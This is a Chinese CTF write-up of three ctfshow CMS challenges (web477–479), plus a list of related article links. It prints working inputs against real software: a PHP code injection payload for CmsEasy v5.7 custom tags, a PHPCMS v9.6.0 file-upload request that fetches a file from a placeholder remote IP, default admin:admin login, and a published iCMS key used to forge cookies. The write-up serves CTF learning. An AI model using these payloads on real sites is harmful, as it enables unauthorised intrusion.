0x01 Web 477

打开页面发现是CmsEasy建站系统，题目提示RCE，百度寻找对应相关漏洞，多方查找后发现版本是v5.7，找到对应版本后进行搜索就变得很简单了。

找登录后台，/admin进入登录窗，然后小手一敲弱口令admin:admin进入后台，有点沙雕.......

忘记密码好像是存在洞的，重置完默认账号密码才会是admin:admin。因为这里默认admin就可以登录进去，漏洞存在与否不好验证，有兴趣的童鞋可以找找。

CmsEasy_v5.7 漏洞测试 - 云+社区 - 腾讯云

漏洞点在于模板-自定义标签部分，使用的payload： 1111111111";}<?php phpinfo()?>

因为不知道它在哪里RCE，于是都填写payload进行攻击，打击预览，CRTL+F搜索ctfshow找到flag

payload构造这个东西涉及到代码审计，所以触及到我的知识盲区，唯一能感受到的是前面闭合，后面命令执行，如果有懂原理的朋友可以讲一讲。

0x02 Web 478

按照题目提示安装cms系统

CMS版本是phpcms v9.6.0，安装完成后访问页面如下图所示

题目提示为文件上传，搜索相关漏洞，FreeBuf找到文章

PHPCMS v9.6.0 任意文件上传漏洞分析 - FreeBuf网络安全行业门户

上传点问题处在注册部分，进行复现

经我测试，按照抓包内容进行修改直接发包是不行的。

所以这里的poc就按照Freebuf上复制粘贴进行对应修改即可

siteid=1&modelid=11&username=test452&password=test2123&email=test2154@163.com&info[content]=<img src=http://xx.xx.xx.xx/1.txt?.php#.jpg>&dosubmit=1&protocol=

这里有两个注意点，第一个经测试不可以直接写php文件，发包后网页可以访问，但是会有问题，一句话不能执行，所以写txt；第二点，如果失败多记尝试几次，发包时记得修改邮箱、账号的值。

至于payload构造原理，涉及到代码审计，给出链接，可以自行参考学习。

PHP-code-audit/phpcmsv9.6.0 任意文件上传漏洞.md at master · jiangsir404/PHP-code-audit · GitHub

flag在根目录，提交即可。

0x03 Web 479

他喵的这道题可以说flag和sql注入没有毛关系.......

查找资料icms sql注入点是后台处 /admincp.php，但是搜索过后发现该cms不存在默认账号密码，尝试登录失败。于是查看hint，提示：默认key:n9pSQYvdWhtBz3UHZFVL7c6vf4x6fePk，key伪造。

因触及到知识盲区，询问大哥，一番讲解，恍然大悟，要挖洞洞在后台，后台进不去通过默认key伪造cookie登进后台，百度一番，在github上找到Y4tacker生成cookie脚本，链接如下：

https://github.com/Stakcery/Web-Security/blob/4aac5ffb955667b15ee3110fb99f6df1016c6760/%E6%A1%86%E6%9E%B6%E6%BC%8F%E6%B4%9EAndCMS%E5%AE%A1%E8%AE%A1/CMS/iCMS/iCMS-7.0.1%E5%89%8D%E5%8F%B0%E7%99%BB%E5%BD%95%E7%BB%95%E8%BF%87%E5%88%86%E6%9E%90/1.md

根据poc生成值

登录伪造，进入后台，发现flag

0x04 总结

CMS系列仔细想了想，决定停手。原本认为找到CMS对应版本漏洞直接打就行，做了几题感觉效果是有但终究还是舍本逐末，还是得懂代码审计再进行操作对于技术来讲比较有意义。

ctfshow CMS系列writeup（web477-web479）相关推荐

1. ctfshow七夕杯 writeup

   文章目录 杂项签到 你会lsb吗 海盗的密码 密码签到 社工签到 迷失的大象 大飞机 杂项签到 flag在最底部 你会lsb吗 从后往前看是504b0304,需要将内容给反转一下 with open( ...

2. Android逆向writeup,[原创]腾讯apk逆向系列WriteUp

   0x00 前言 正在学习安卓逆向的萌新SR绝赞刷题中,昨天做了三道有意思的题目,感觉很适合入门,于是写了个wp发了出来 题目已上传至文章附件,想摸的dalao们可以看看( 0x01 APP1 工具:J ...

3. 安鸾CMS系列之Wordpress02

   1. 0x00 前言 2. 0x01 看一波题目 3. 0x02 信息收集 4. 0x03 BP在爆破 5. 0x04 图片上的马儿 6. 0x05 WordPress 5.0 RCE 7. 0x06 ...

4. 安鸾渗透实战平台（cms系列）wordpress01 (200分)

   漏洞环境 安鸾渗透实战平台 公网云主机一台(用来接收反弹shell和发送文件) 题目: 通过查看源码得知版本号为4.6 找该版本的历史漏洞 挑选一个姿势进行复现 这里我用的是反弹shell的手法 参考 ...

5. 【视频教程】帝国CMS制作网站系列教程08—单页模板的制作

   作为一个程序员,搭建一个自己的博客网站是件非常容易的事情,但是作为很多非程序员非计算机专业的学习者来讲,可能就需要花点时间进行学习,而如果你想通过自学来学习怎么制作一个属于自己的网站的话,那这套帝国C ...

6. 【视频教程】帝国CMS制作网站系列教程14—标签模板及标签讲解

   作为一个程序员,搭建一个自己的博客网站是件非常容易的事情,但是作为很多非程序员非计算机专业的学习者来讲,可能就需要花点时间进行学习,而如果你想通过自学来学习怎么制作一个属于自己的网站的话,那这套帝国C ...

7. 【视频教程】帝国CMS制作网站系列教程16—帝国CMS总结

   作为一个程序员,搭建一个自己的博客网站是件非常容易的事情,但是作为很多非程序员非计算机专业的学习者来讲,可能就需要花点时间进行学习,而如果你想通过自学来学习怎么制作一个属于自己的网站的话,那这套帝国C ...

8. 【视频教程】帝国CMS制作网站系列教程17—帝国CMS模板的策划

   作为一个程序员,搭建一个自己的博客网站是件非常容易的事情,但是作为很多非程序员非计算机专业的学习者来讲,可能就需要花点时间进行学习,而如果你想通过自学来学习怎么制作一个属于自己的网站的话,那这套帝国C ...

9. 【视频教程】帝国CMS制作网站系列教程13—全站全文搜索及模板

   作为一个程序员,搭建一个自己的博客网站是件非常容易的事情,但是作为很多非程序员非计算机专业的学习者来讲,可能就需要花点时间进行学习,而如果你想通过自学来学习怎么制作一个属于自己的网站的话,那这套帝国C ...

最新文章

1. 测试CPU品牌和当前工作频率
2. linux下查找java的安装路径和java和tomcat的环境配置
3. 为什么项目开放源代码之后就变成死项目 很少或几乎不再更新
4. 主机和虚拟机ping不通的原因
5. 语言中的petchar运用_还在担心你家孩子发音、语言问题？12个表现、3个预防是重点...
6. 以30字符宽居中输出python字符串_Python3 字符串
7. 两张图告诉你tnsnames.ora 的配置详解
8. 约瑟夫环问题（链表 + 公式）
9. 阶段1 语言基础+高级_1-3-Java语言高级_06-File类与IO流_05 IO字符流_6_字符输出流写数据的其他方法...
10. LM算法+推导+C++代码实践
11. 怎么用计算机进行气象预报,中央气象台进行天气预报，先用计算机解出描述天气演变的方程组，“算”出来未来天 - 问答库...
12. BJ模拟 Different Trips【树上后缀数组】
13. myeclipse误删文件恢复
14. Sp是如何走到这一步
15. Leetcode 1628. Design an Expression Tree With Evaluate Function [Python]
16. React 生成二维码
17. nao机器人国际比赛程序 python编写
18. iphone相册储存空间已满_iPhone老提示储存空间已满的具体处理操作
19. 分析mysql股票数据_股票数据分析（一）数据获取
20. 嵌入式Linux开发环境部署

热门文章

1. STM32 第7讲 STM32F407系列系统架构及映射
2. Nginx配置多域名跳转到不同的Tomcat服务器，
3. 重点！！！计算虚拟化技术（HCIE云方向）
4. Python深度学习-Data Augmentation：使用Augly库进行图片数据增强
5. 蓝宝书新日本语能力考试N1~N5全套资料PDF分享 ​​​​
6. 杰理 AC692N系列 ---时钟闹钟开发流程 做一个简单的闹钟
7. elementui选择月份加上中下旬
8. mysql 临时表 两次_重复的临时表MySQL
9. AI笔记: 数学基础之矩阵的初等变换计算矩阵的秩
10. Springboot基于Java Web的华家医疗器械商城设计与实现 毕业设计-附源码261620